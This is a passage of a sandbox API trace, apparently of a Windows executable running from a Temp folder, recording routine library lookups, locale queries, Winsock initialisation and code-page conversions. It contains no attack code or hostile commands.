lpProcName="VarNot") returned 0x76c8ec66 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0096.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0096.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0096.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0096.891] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15368019838) returned 1 [0096.891] GetTickCount () returned 0x2335e [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15368038889) returned 1 [0096.891] GetTickCount () returned 0x2335e [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0096.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0096.891] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0096.892] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0096.892] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0096.892] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0096.893] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0096.893] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0096.893] GetThreadLocale () returned 0x409 [0096.893] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0096.893] GetCurrentThreadId () returned 0xb78 [0096.893] GetCurrentThreadId () returned 0xb78 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0096.893] GetThreadLocale () returned 0x409 [0096.893] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0096.893] GetThreadLocale () returned 0x409 [0096.893] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0096.893] GetCurrentThreadId () returned 0xb78 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0096.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0096.894] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0096.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0096.895] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0096.899] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0096.900] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0096.915] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0096.916] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0096.916] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0096.922] GetACP () returned 0x4e4 [0096.922] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0096.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.922] GetTickCount () returned 0x2337e [0096.922] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15371160530) returned 1 [0096.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x71\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x41\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x34\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0096.923] LoadStringW (in: 